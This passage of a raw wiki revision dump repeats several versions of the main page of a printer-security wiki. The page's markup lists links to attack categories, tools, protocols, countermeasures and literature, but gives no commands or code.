9100 printing]] * [[Cross-site printing]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Countermeasures</h2> |- | * [[Countermeasures#Vendors|Vendors]], [[Countermeasures#Admins|Admins]], [[Countermeasures#Users|Users]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Bibliography</h2> |- | * [[Bibliography|Literature on printer security]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">References</h2> |- | * [[References|Printer language references]] |} |} <table id="mp-middle" style="width:100%; margin:4px 0 0 0; background:none; border-spacing: 0px;"> <tr> <td class="MainPageBG" style="width:100%; border:1px solid #f2cedd; background:#fff5fa; vertical-align:top; color:#000;"> <table id="mp-center" style="width:100%; vertical-align:top; background:#fff5fa; color:#000;"> <tr> <td style="padding:2px;"><h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2></td> </tr><tr> <td style="color:#000;"><div id="mp-tfl" style="padding:5px 8px;">Comming soon: ''Hacking PostScript processing websites''</div></td> </tr> </table> </td> </tr> <!-- <div style="margin-top:0.5em; padding:0.3em 0.3em 0.3em 0.3em; background-color:#fff5fa; align:right; border:1px solid #ddccff;"> <h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2> <div id="mp-tfl" style="padding:6px 6px;"> Hacking PostScript Processors / websites </div> </div> --------------- Consult the [//meta.wikimedia.org/wiki/Help:Contents User's Guide] for information on using the wiki software. == Getting started == * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:Configuration_settings Configuration settings list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:FAQ MediaWiki FAQ] * [https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce MediaWiki release mailing list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Localisation#Translation_resources Localise MediaWiki for your language] --> __NOTOC__ 68bf433137f88c02cbc105c881badeed1c03d2a2 165 61 2017-01-20T15:45:49Z 77.182.101.158 0 wikitext text/x-wiki <div style="margin-top:0.5em; padding:0.5em 0.5em 0.5em 0.5em; background-color:#faf0ff; align:right; border:1px solid #ddccff;"> <div id="mp-tfl" style="padding:0px 6px;"> This is the '''Hacking Printers Wiki''', an open approach to share knowledge on printer (in)security. </div> </div> <!-- TODAY'S FEATURED CONTENT --> {| id="mp-upper" style="width: 100%; margin:4px 0 0 0; background:none; border-spacing: 0px;" <!-- ATTACKS --> | class="MainPageBG" style="width:55%; border:1px solid #cef2e0; background:#f5fffa; vertical-align:top; color:#000;" | {| id="mp-left" style="width:100%; vertical-align:top; background:#f5fffa;" | style="padding:2px;" | <h2 id="mp-tfa-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Attacks</h2> |- | * '''[[Denial of service]]''': ** [[Transmission channel]] ** [[Document processing]] ** [[Physical damage]] * '''[[Privilege escalation]]''': ** [[Factory defaults]] ** [[Accounting bypass]] ** [[Fax and Scanner]] * '''[[Print job access]]''': ** [[Print job retention]] ** [[Print job manipulation]] * '''[[Information disclosure]]''': ** [[Memory access]] ** [[File system access]] ** [[Credential disclosure]] * '''[[Code execution]]''': ** [[Buffer overflows]] ** [[Firmware updates]] ** [[Software packages]] |- | style="padding:2px;" | <h2 id="mp-dyk-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">TL;DR</h2> |- | <div style="padding:0px 8px;"> Check out the [[Printer Security Testing Cheat Sheet]] </div> |} | style="border:1px solid transparent;" | <!-- OTHER STUFF --> | class="MainPageBG" style="width:45%; border:1px solid #cedff2; background:#f5faff; vertical-align:top;"| {| id="mp-right" style="width:100%; vertical-align:top; background:#f5faff;" | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Tools</h2> |- | * [[PRET]], [[Praeda]], [[PFT]], [[BeEF]] |- | style="padding:2px;" | <h2 id="mp-itn-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Fundamentials</h2> |- | * '''[[Fundamentals#Printer Control Languages|Printer languages]] ** [[PJL]], [[PCL]], [[PostScript]] * '''[[Fundamentals#Network printing protocols|Network protocols]] ** [[LPD]], [[IPP]], [[Raw]], [[SMB]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Attack Carriers</h2> |- | * [[USB drive or cable]] * [[Port 9100 printing]] * [[Cross-site printing]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Countermeasures</h2> |- | * [[Countermeasures#Vendors|Vendors]], [[Countermeasures#Admins|Admins]], [[Countermeasures#Users|Users]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Bibliography</h2> |- | * [[Bibliography|Literature on printer security]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">References</h2> |- | * [[References|Printer language references]] |} |} <table id="mp-middle" style="width:100%; margin:4px 0 0 0; background:none; border-spacing: 0px;"> <tr> <td class="MainPageBG" style="width:100%; border:1px solid #f2cedd; background:#fff5fa; vertical-align:top; color:#000;"> <table id="mp-center" style="width:100%; vertical-align:top; background:#fff5fa; color:#000;"> <tr> <td style="padding:2px;"><h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2></td> </tr><tr> <td style="color:#000;"><div id="mp-tfl" style="padding:5px 8px;">Comming soon: ''Hacking PostScript processing websites''</div></td> </tr> </table> </td> </tr> <!-- <div style="margin-top:0.5em; padding:0.3em 0.3em 0.3em 0.3em; background-color:#fff5fa; align:right; border:1px solid #ddccff;"> <h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2> <div id="mp-tfl" style="padding:6px 6px;"> Hacking PostScript Processors / websites </div> </div> --------------- Consult the [//meta.wikimedia.org/wiki/Help:Contents User's Guide] for information on using the wiki software. == Getting started == * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:Configuration_settings Configuration settings list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:FAQ MediaWiki FAQ] * [https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce MediaWiki release mailing list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Localisation#Translation_resources Localise MediaWiki for your language] --> __NOTOC__ d79b6a1fd4889be34850f7bb2c070683a9802a7f 61 29 2017-01-07T18:48:34Z Admin 1 wikitext text/x-wiki <div style="margin-top:0.5em; padding:0.5em 0.5em 0.5em 0.5em; background-color:#faf0ff; align:right; border:1px solid #ddccff;"> <div id="mp-tfl" style="padding:0px 6px;"> This is the '''Hacking Printers Wiki''', an open approach to share knowledge on printer (in)security. </div> </div> <!-- TODAY'S FEATURED CONTENT --> {| id="mp-upper" style="width: 100%; margin:4px 0 0 0; background:none; border-spacing: 0px;" <!-- ATTACKS --> | class="MainPageBG" style="width:55%; border:1px solid #cef2e0; background:#f5fffa; vertical-align:top; color:#000;" | {| id="mp-left" style="width:100%; vertical-align:top; background:#f5fffa;" | style="padding:2px;" | <h2 id="mp-tfa-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Attacks</h2> |- | * '''[[Denial of service]]''': ** [[Transmission channel]] ** [[Document processing]] ** [[Physical damage]] * '''[[Privilege escalation]]''': ** [[Factory defaults]] ** [[Accounting bypass]] ** [[Fax and Scanner]] * '''[[Print job access]]''': ** [[Print job retention]] ** [[Print job manipulation]] * '''[[Information disclosure]]''': ** [[Memory access]] ** [[File system access]] ** [[Credential disclosure]] * '''[[Code execution]]''': ** [[Buffer overflows]] ** [[Firmware updates]] ** [[Software packages]] |- | style="padding:2px;" | <h2 id="mp-dyk-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">TL;DR</h2> |- | <div style="padding:0px 8px;"> Check out the [[Printer Security Testing Cheat Sheet]] </div> |} | style="border:1px solid transparent;" | <!-- OTHER STUFF --> | class="MainPageBG" style="width:45%; border:1px solid #cedff2; background:#f5faff; vertical-align:top;"| {| id="mp-right" style="width:100%; vertical-align:top; background:#f5faff;" | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Tools</h2> |- | * [[PRET]], [[Praeda]], [[PFT]], [[BeEF]] |- | style="padding:2px;" | <h2 id="mp-itn-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Fundamentials</h2> |- | * '''[[Fundamentals#Printer Control Languages|Printer languages]] ** [[PJL]], [[PCL]], [[PostScript]] * '''[[Fundamentals#Network printing protocols|Network protocols]] ** [[LPD]], [[IPP]], [[Raw]], [[SMB]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Attack Carriers</h2> |- | * [[USB drive or cable]] * [[Port 9100 printing]] * [[Cross-site printing]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Countermeasures</h2> |- | * [[Countermeasures#Vendors|Vendors]], [[Countermeasures#Admins|Admins]], [[Countermeasures#Users|Users]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Bibliography</h2> |- | * [[Bibliography|Literature on printer security]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">References</h2> |- | * [[References|Printer language references]] |} |} <table id="mp-middle" style="width:100%; margin:4px 0 0 0; background:none; border-spacing: 0px;"> <tr> <td class="MainPageBG" style="width:100%; border:1px solid #f2cedd; background:#fff5fa; vertical-align:top; color:#000;"> <table id="mp-center" style="width:100%; vertical-align:top; background:#fff5fa; color:#000;"> <tr> <td style="padding:2px;"><h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2></td> </tr><tr> <td style="color:#000;"><div id="mp-tfl" style="padding:5px 8px;">Hacking [[Beyond Printers|PostScript processing websites]]</div></td> </tr> </table> </td> </tr> <!-- <div style="margin-top:0.5em; padding:0.3em 0.3em 0.3em 0.3em; background-color:#fff5fa; align:right; border:1px solid #ddccff;"> <h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2> <div id="mp-tfl" style="padding:6px 6px;"> Hacking PostScript Processors / websites </div> </div> --------------- Consult the [//meta.wikimedia.org/wiki/Help:Contents User's Guide] for information on using the wiki software. == Getting started == * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:Configuration_settings Configuration settings list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:FAQ MediaWiki FAQ] * [https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce MediaWiki release mailing list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Localisation#Translation_resources Localise MediaWiki for your language] --> __NOTOC__ 3ff3c337954e3bb5699729009acec3123c2a89ec 29 26 2016-12-31T11:11:24Z Admin 1 wikitext text/x-wiki <div style="margin-top:0.5em; padding:0.5em 0.5em 0.5em 0.5em; background-color:#faf0ff; align:right; border:1px solid #ddccff;"> <div id="mp-tfl" style="padding:0px 6px;"> This is the '''Hacking Printers Wiki''', an open approach to share knowledge on printer (in)security. </div> </div> <!-- TODAY'S FEATURED CONTENT --> {| id="mp-upper" style="width: 100%; margin:4px 0 0 0; background:none; border-spacing: 0px;" <!-- ATTACKS --> | class="MainPageBG" style="width:55%; border:1px solid #cef2e0; background:#f5fffa; vertical-align:top; color:#000;" | {| id="mp-left" style="width:100%; vertical-align:top; background:#f5fffa;" | style="padding:2px;" | <h2 id="mp-tfa-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Attacks</h2> |- | * '''[[Denial of service]]''': ** [[Transmission channel]] ** [[Document processing]] ** [[Physical damage]] * '''[[Privilege escalation]]''': ** [[Factory defaults]] ** [[Accounting bypass]] ** [[Fax and Scanner]] * '''[[Print job access]]''': ** [[Print job retention]] ** [[Print job manipulation]] * '''[[Information disclosure]]''': ** [[Memory access]] ** [[File system access]] ** [[Credential disclosure]] * '''[[Code execution]]''': ** [[Buffer overflows]] ** [[Firmware updates]] ** [[Software packages]] |- | style="padding:2px;" | <h2 id="mp-dyk-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">TL;DR</h2> |- | <div style="padding:0px 8px;"> Check out the [[Printer Security Testing Cheat Sheet]] </div> |} | style="border:1px solid transparent;" | <!-- OTHER STUFF --> | class="MainPageBG" style="width:45%; border:1px solid #cedff2; background:#f5faff; vertical-align:top;"| {| id="mp-right" style="width:100%; vertical-align:top; background:#f5faff;" | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Tools</h2> |- | * [[PRET]], [[Praeda]], [[PFT]], [[BeEF]] |- | style="padding:2px;" | <h2 id="mp-itn-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Fundamentials</h2> |- | * '''[[Printer languages]] ** [[PJL]], [[PCL]], [[PostScript]] * '''[[Network protocols]] ** [[LPD]], [[IPP]], [[Raw]], [[SMB]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Attack Carriers</h2> |- | * [[USB drive or cable]] * [[Port 9100 printing]] * [[Cross-site printing]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Countermeasures</h2> |- | * [[Countermeasures#Vendors|Vendors]], [[Countermeasures#Admins|Admins]], [[Countermeasures#Users|Users]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Bibliography</h2> |- | * [[Bibliography|Literature on printer security]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">References</h2> |- | * [[References|Printer language references]] |} |} <table id="mp-middle" style="width:100%; margin:4px 0 0 0; background:none; border-spacing: 0px;"> <tr> <td class="MainPageBG" style="width:100%; border:1px solid #f2cedd; background:#fff5fa; vertical-align:top; color:#000;"> <table id="mp-center" style="width:100%; vertical-align:top; background:#fff5fa; color:#000;"> <tr> <td style="padding:2px;"><h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2></td> </tr><tr> <td style="color:#000;"><div id="mp-tfl" style="padding:5px 8px;">Hacking [[Beyond Printers|PostScript processing websites]]</div></td> </tr> </table> </td> </tr> <!-- <div style="margin-top:0.5em; padding:0.3em 0.3em 0.3em 0.3em; background-color:#fff5fa; align:right; border:1px solid #ddccff;"> <h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2> <div id="mp-tfl" style="padding:6px 6px;"> Hacking PostScript Processors / websites </div> </div> --------------- Consult the [//meta.wikimedia.org/wiki/Help:Contents User's Guide] for information on using the wiki software. == Getting started == * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:Configuration_settings Configuration settings list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:FAQ MediaWiki FAQ] * [https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce MediaWiki release mailing list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Localisation#Translation_resources Localise MediaWiki for your language] --> __NOTOC__ 85ed9cb64199e37bd05d9ae4465737b6555c7c4d 26 20 2016-12-22T17:00:32Z Admin 1 wikitext text/x-wiki <div style="margin-top:0.5em; padding:0.5em 0.5em 0.5em 0.5em; background-color:#faf0ff; align:right; border:1px solid #ddccff;"> <div id="mp-tfl" style="padding:0px 6px;"> This is the '''Hacking Printers Wiki''', an open approach to share knowledge on printer (in)security. </div> </div> <!-- TODAY'S FEATURED CONTENT --> {| id="mp-upper" style="width: 100%; margin:4px 0 0 0; background:none; border-spacing: 0px;" <!-- ATTACKS --> | class="MainPageBG" style="width:55%; border:1px solid #cef2e0; background:#f5fffa; vertical-align:top; color:#000;" | {| id="mp-left" style="width:100%; vertical-align:top; background:#f5fffa;" | style="padding:2px;" | <h2 id="mp-tfa-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Attacks</h2> |- | * '''[[Denial of service]]''': ** [[Transmission channel]] ** [[Document processing]] ** [[Physical damage]] * '''[[Privilege escalation]]''': ** [[Factory defaults]] ** [[Accounting bypass]] ** [[Fax and Scanner]] * '''[[Print job access]]''': ** [[Print job retention]] ** [[Print job manipulation]] * '''[[Information disclosure]]''': ** [[Memory access]] ** [[File system access]] ** [[Credential disclosure]] * '''[[Code execution]]''': ** [[Buffer overflows]] ** [[Firmware updates]] ** [[Software packages]] |- | style="padding:2px;" | <h2 id="mp-dyk-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">TL;DR</h2> |- | <div style="padding:0px 8px;"> Check out the [[Printer Security Testing Cheat Sheet]] </div> |} | style="border:1px solid transparent;" | <!-- OTHER STUFF --> | class="MainPageBG" style="width:45%; border:1px solid #cedff2; background:#f5faff; vertical-align:top;"| {| id="mp-right" style="width:100%; vertical-align:top; background:#f5faff;" | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Tools</h2> |- | * [[PRET]], [[Praeda]], [[PFT]], [[BeEF]] |- | style="padding:2px;" | <h2 id="mp-itn-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Fundamentials</h2> |- | * '''[[Printer languages]] ** [[PJL]], [[PCL]], [[PostScript]] * '''[[Network protocols]] ** [[LPD]], [[IPP]], [[Raw]], [[SMB]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Attack Carriers</h2> |- | * [[USB drive or cable]] * [[Port 9100 printing]] * [[Cross-site printing]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Countermeasures</h2> |- | * [[Countermeasures#Vendors|Vendors]], [[Countermeasures#Admins|Admins]], [[Countermeasures#Users|Users]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Bibliography</h2> |- | * [[Bibliography|Literature on printer security]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">References</h2> |- | * [[References|Printer language references]] |} |} <table id="mp-middle" style="width:100%; margin:4px 0 0 0; background:none; border-spacing: 0px;"> <tr> <td class="MainPageBG" style="width:100%; border:1px solid #f2cedd; background:#fff5fa; vertical-align:top; color:#000;"> <table id="mp-center" style="width:100%; vertical-align:top; background:#fff5fa; color:#000;"> <tr> <td style="padding:2px;"><h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2></td> </tr><tr> <td style="color:#000;"><div id="mp-tfl" style="padding:5px 8px;">Hacking [[PostScript processing websites]]</div></td> </tr> </table> </td> </tr> <!-- <div style="margin-top:0.5em; padding:0.3em 0.3em 0.3em 0.3em; background-color:#fff5fa; align:right; border:1px solid #ddccff;"> <h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2> <div id="mp-tfl" style="padding:6px 6px;"> Hacking PostScript Processors / websites </div> </div> --------------- Consult the [//meta.wikimedia.org/wiki/Help:Contents User's Guide] for information on using the wiki software. == Getting started == * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:Configuration_settings Configuration settings list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:FAQ MediaWiki FAQ] * [https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce MediaWiki release mailing list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Localisation#Translation_resources Localise MediaWiki for your language] --> __NOTOC__ b78b1f115c5a6165ae1768ce588cb0b1e37f54e0 20 15 2016-11-25T19:39:10Z Admin 1 wikitext text/x-wiki <div style="margin-top:0.5em; padding:0.5em 0.5em 0.5em 0.5em; background-color:#faf0ff; align:right; border:1px solid #ddccff;"> <div id="mp-tfl" style="padding:0px 6px;"> This is the '''Hacking Printers Wiki''', an open approach to share knowledge on printer (in)security. </div> </div> <!-- TODAY'S FEATURED CONTENT --> {| id="mp-upper" style="width: 100%; margin:4px 0 0 0; background:none; border-spacing: 0px;" <!-- ATTACKS --> | class="MainPageBG" style="width:55%; border:1px solid #cef2e0; background:#f5fffa; vertical-align:top; color:#000;" | {| id="mp-left" style="width:100%; vertical-align:top; background:#f5fffa;" | style="padding:2px;" | <h2 id="mp-tfa-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Attacks</h2> |- | * '''[[Denial of service]]''': ** [[Transmission channel]] ** [[Document processing]] ** [[Physical damage]] * '''[[Privilege escalation]]''': ** [[Factory defaults]] ** [[Accounting bypass]] ** [[Fax and Scanner]] * '''[[Print job access]]''': ** [[Print job retention]] ** [[Print job manipulation]] * '''[[Information disclosure]]''': ** [[Memory access]] ** [[File system access]] ** [[Credential disclosure]] * '''[[Code execution]]''': ** [[Buffer overflows]] ** [[Firmware updates]] ** [[Software packages]] |- | style="padding:2px;" | <h2 id="mp-dyk-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">TL;DR</h2> |- | <div style="padding:0px 8px;"> Check out the [[Printer Security Testing Cheat Sheet]] </div> |} | style="border:1px solid transparent;" | <!-- OTHER STUFF --> | class="MainPageBG" style="width:45%; border:1px solid #cedff2; background:#f5faff; vertical-align:top;"| {| id="mp-right" style="width:100%; vertical-align:top; background:#f5faff;" | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Tools</h2> |- | * [[PRET]], [[Praeda]], [[PFT]], [[BeEF]] |- | style="padding:2px;" | <h2 id="mp-itn-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Fundamentials</h2> |- | * '''[[Printer languages]] ** [[PJL]], [[PCL]], [[PostScript]] * '''[[Network protocols]] ** [[LPD]], [[IPP]], [[Raw]], [[SMB]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Attack Carriers</h2> |- | * [[USB drive or cable]] * [[Port 9100 printing]] * [[Cross-site printing]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Countermeasures</h2> |- | * [[Countermeasures#Vendors|Vendors]], [[Countermeasures#Admins|Admins]], [[Countermeasures#Users|Users]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Bibliography</h2> |- | * [[Bibliography|Some literature]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Links</h2> |- | * [[Links|Further reading]] |} |} <table id="mp-middle" style="width:100%; margin:4px 0 0 0; background:none; border-spacing: 0px;"> <tr> <td class="MainPageBG" style="width:100%; border:1px solid #f2cedd; background:#fff5fa; vertical-align:top; color:#000;"> <table id="mp-center" style="width:100%; vertical-align:top; background:#fff5fa; color:#000;"> <tr> <td style="padding:2px;"><h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2></td> </tr><tr> <td style="color:#000;"><div id="mp-tfl" style="padding:5px 8px;">Hacking [[PostScript processing websites]]</div></td> </tr> </table> </td> </tr> <!-- <div style="margin-top:0.5em; padding:0.3em 0.3em 0.3em 0.3em; background-color:#fff5fa; align:right; border:1px solid #ddccff;"> <h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2> <div id="mp-tfl" style="padding:6px 6px;"> Hacking PostScript Processors / websites </div> </div> --------------- Consult the [//meta.wikimedia.org/wiki/Help:Contents User's Guide] for information on using the wiki software. == Getting started == * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:Configuration_settings Configuration settings list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:FAQ MediaWiki FAQ] * [https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce MediaWiki release mailing list] * 